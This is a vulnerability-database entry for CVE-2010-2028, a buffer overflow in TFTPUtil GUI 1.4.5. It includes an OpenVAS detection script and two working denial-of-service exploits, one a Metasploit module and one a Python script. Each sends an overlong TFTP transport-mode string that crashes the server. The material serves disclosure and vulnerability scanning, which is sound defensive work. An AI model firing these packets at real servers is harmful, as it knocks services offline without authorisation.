ID CVE-2010-2028 Type cve Reporter NVD Modified 2017-08-16T21:32:35
Description
Buffer overflow in k23productions TFTPUtil GUI (aka TFTPGUI) 1.4.5 allows remote attackers to cause a denial of service (crash) and possibly execute arbitrary code via a long transport mode.
{"openvas": [{"lastseen": "2018-09-02T00:05:04", "references": ["http://www.securityfocus.com/bid/39872", "http://sourceforge.net/projects/tftputil"], "pluginID": "1361412562310100618", "description": "TFTPUtil GUI is prone to a buffer-overflow vulnerability.", "edition": 4, "reporter": "This script is Copyright (C) 2010 Greenbone Networks GmbH", "published": "2010-05-04T00:00:00", "title": "TFTPUtil GUI Long Transport Mode Buffer Overflow Vulnerability", "type": "openvas", "enchantments": {"score": {"vector": "NONE", "value": 7.5}}, "naslFamily": "Buffer overflow", "bulletinFamily": "scanner", "cvelist": ["CVE-2010-2028"], "modified": "2017-09-14T00:00:00", "id": "OPENVAS:1361412562310100618", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310100618", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n# $Id: gb_TFTPUtil_GUI_39872.nasl 7133 2017-09-14 14:31:13Z cfischer $\n#\n# TFTPUtil GUI Long Transport Mode Buffer Overflow Vulnerability\n#\n# Authors:\n# Michael Meyer <michael.meyer@greenbone.net>\n#\n# Copyright:\n# Copyright (c) 2010 Greenbone Networks GmbH\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif (description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.100618\");\n script_version(\"$Revision: 7133 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2017-09-14 16:31:13 +0200 (Thu, 14 Sep 2017) $\");\n script_tag(name:\"creation_date\", value:\"2010-05-04 12:32:13 +0200 (Tue, 04 May 2010)\");\n script_tag(name:\"cvss_base\", value:\"10.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_cve_id(\"CVE-2010-2028\");\n script_bugtraq_id(39872);\n\n script_name(\"TFTPUtil GUI Long Transport Mode Buffer Overflow Vulnerability\");\n\n script_xref(name : \"URL\" , value : \"http://www.securityfocus.com/bid/39872\");\n script_xref(name : \"URL\" , value : \"http://sourceforge.net/projects/tftputil\");\n\n script_category(ACT_DENIAL);\n script_family(\"Buffer overflow\");\n script_copyright(\"This script is Copyright (C) 2010 Greenbone Networks GmbH\");\n script_dependencies('tftpd_detect.nasl');\n script_require_udp_ports(\"Services/udp/tftp\", 69);\n\n script_tag(name : \"summary\" , value : \"TFTPUtil GUI is prone to a buffer-overflow vulnerability.\");\n script_tag(name : \"impact\" , value : \"An attacker can exploit this issue to execute arbitrary code within\n the context of the affected application. Failed exploit attempts will\n result in a denial-of-service condition.\");\n script_tag(name : \"affected\" , value : \"TFTPUtil GUI 1.4.5 is vulnerable; other versions may also be affected.\");\n script_tag(name : \"solution\" , value : \"No solution or patch was made available for at least one year\n since disclosure of this vulnerability. Likely none will be provided anymore.\n General solution options are to upgrade to a newer release, disable respective\n features, remove the product or replace the product by another one.\");\n\n script_tag(name:\"solution_type\", value:\"WillNotFix\");\n\n script_tag(name:\"qod_type\", value:\"remote_vul\");\n\n exit(0);\n}\n\ninclude(\"tftp.inc\");\n\nif(safe_checks())exit(0);\n\nport = get_kb_item('Services/udp/tftp');\nif (! port) port = 69;\nif(!get_udp_port_state(port))exit(0);\n\nif(!tftp_alive(port:port))exit(0);\n\nfn = \"A\";\nmd = crap(data:\"A\", length:500);\nstuff = raw_string(0x00,0x02) + fn + raw_string(0x00) + md + raw_string(0x00);\n\nsoc = open_sock_udp(port);\nif(!soc)exit(0);\n\nsend(socket:soc, data:stuff);\n\nif(!tftp_alive(port:port)) {\n security_message(port:port,proto:\"udp\");\n exit(0);\n} \n\nexit(99);\n", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}], "exploitdb": [{"lastseen": "2016-02-01T16:43:13", "osvdbidlist": ["64888"], "references": [], "description": "TFTPGUI v1.4.5 Long Transport Mode Overflow DoS (Meta). CVE-2010-2028. Dos exploit for windows platform", "edition": 1, "reporter": "Jeremiah Talamantes", "published": "2010-05-08T00:00:00", "enchantments": {"score": {"vector": "NONE", "value": 7.5}}, "type": "exploitdb", "title": "TFTPGUI 1.4.5 - Long Transport Mode Overflow DoS Meta", "bulletinFamily": "exploit", "cvelist": ["CVE-2010-2028"], "modified": "2010-05-08T00:00:00", "id": "EDB-ID:12530", "href": "https://www.exploit-db.com/exploits/12530/", "sourceData": "# Title: TFTPGUI v1.4.5 Long Transport Mode Overflow\r\n# EDB-ID: 12482\r\n# CVE-ID: ()\r\n# OSVDB-ID: ()\r\n# Author: Jeremiah Talamantes\r\n# Published: 2010-05-02\r\n# Verified: yes\r\n\r\n##\r\n# This file is part of the Metasploit Framework and may be subject to \r\n# redistribution and commercial restrictions. Please see the Metasploit\r\n# Framework web site for more information on licensing and terms of use.\r\n# http://metasploit.com/framework/ \r\n##\r\n\r\n##\r\n#\r\n# TFTPGUI v1.4.5 Long Transport Mode Overflow\r\n#\r\n# Tested on: Windows XP, SP2 (EN)\r\n#\r\n# Date tested: 5/2/2010\r\n#\r\n#\r\n# |~Greetz to Devin @ infointox.net~|\r\n#\r\n# Discovered by: Jeremiah Talamantes\r\n# RedTeam Security\r\n# http://www.redteamsecure.com\r\n##\r\n\r\nrequire 'msf/core'\r\n\r\nclass Metasploit3 < Msf::Auxiliary\r\n\r\n\tinclude Msf::Exploit::Remote::Udp\r\n\tinclude Msf::Auxiliary::Dos\r\n\r\n\tdef initialize(info = {})\r\n\t\tsuper(update_info(info,\r\n\t\t\t'Name' => 'TFTPGUI v1.4.5 Long Transport Mode Overflow',\r\n\t\t\t'Description' => %q{\r\n\t\t\t\tThe TFTPUtil GUI server version 1.4.5 can be\r\n\t\t\t\tDOSed by sending a specially crafted request. Discovered by\r\n\t\t\t\tJeremiah Talamantes at RedTeam Security. \r\n\t\t\t\tGreetz to Devin @ infointox.net.\r\n\t\t\t},\r\n\t\t\t'Author' => 'Jeremiah Talamantes (RedTeam Security)',\r\n\t\t\t'License' => MSF_LICENSE,\r\n\t\t\t'Version' => '$Revision: 9179 $',\r\n\t\t\t'References' =>\r\n\t\t\t\t[ \r\n\t\t\t\t\t[ 'URL', 'http://www.redteamsecure.com/labs/post/37/redteam-discovers-0-day-in-tftpgui'], \r\n\t\t\t\t\t[ 'URL', 'http://www.exploit-db.com/exploits/12482'], \r\n\t\t\t\t\t[ 'URL', 'http://www.securityfocus.com/bid/39872'],\r\n\t\t\t\t],\r\n\t\t\t'DisclosureDate' => 'May 02 2010'))\r\n\r\n\t\tregister_options([Opt::RPORT(69)])\r\n\tend\r\n\r\n\tdef run\r\n\t\tconnect_udp\r\n\t\tprint_status(\"Sending naughty request...\")\r\n\t\t$fn = \"A\"\r\n\t\t$md = \"A\" * 496\r\n\t\t$stuff = \"\\00\\x02\" + $fn + \"\\0\" + $md + \"\\0\"\r\n\t\tudp_sock.put($stuff)\t\t\r\n\t\tdisconnect_udp\r\n\tend\r\nend\r\n", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "sourceHref": "https://www.exploit-db.com/download/12530/"}, {"lastseen": "2016-02-01T16:35:44", "osvdbidlist": ["64888"], "references": [], "description": "TFTPGUI Long Transport Mode Overflow. CVE-2010-2028. Dos exploit for windows platform", "edition": 1, "reporter": "Jeremiah Talamantes", "published": "2010-05-02T00:00:00", "enchantments": {"score": {"vector": "NONE", "value": 7.5}}, "type": "exploitdb", "title": "TFTPGUI - Long Transport Mode Overflow", "bulletinFamily": "exploit", "cvelist": ["CVE-2010-2028"], "modified": "2010-05-02T00:00:00", "id": "EDB-ID:12482", "href": "https://www.exploit-db.com/exploits/12482/", "sourceData": "# Exploit Title: TFTPGUI Long Transport Mode Overflow\r\n# Date: 5/1/2010\r\n# Author: Jeremiah Talamantes\r\n# Software Link: http://sourceforge.net/projects/tftputil/files/TFTPUtil/TFTPUtil%20Version%201.4.5/TFTPUtil_GUI_Version_1.4.5_Binary_Installer.exe/download\r\n# Version: 1.4.5\r\n# Tested on: Windows XP, SP2 (En)\r\n# CVE : N/A\r\n\r\n#!/usr/bin/python\r\nprint \"\\n#################################################################\"\r\nprint \"## RedTeam Security ##\"\r\nprint \"## TFTPGUI Long Transport Mode Overflow ##\"\r\nprint \"## Version 1.4.5 ##\"\r\nprint \"## LIST Vulnerability ##\"\r\nprint \"## ##\"\r\nprint \"## Jeremiah Talamantes ##\"\r\nprint \"## labs@redteamsecure.com ##\"\r\nprint \"################################################################# \\n\"\r\n\r\nimport socket\r\nimport sys\r\n\r\n# Change these values to suit your needs\r\nhost = '192.168.1.108'\r\nport = 69\r\n \r\ntry:\r\n s = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)\r\nexcept:\r\n print \"Error: unable to connect.\"\r\n sys.exit(1)\r\n \r\n# Creating the overly long transport mode string \r\nfn = \"A\"\r\nmd = \"A\" * 500\r\nstuff = \"\\x00\\x02\" + fn + \"\\0\" + md + \"\\0\"\r\n\r\n# Send data\r\ns.sendto(stuff, (host, port))\r\nprint \"Check to see if TFTPGUI is still running...\"\r\n\r\n# End", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "sourceHref": "https://www.exploit-db.com/download/12482/"}]}
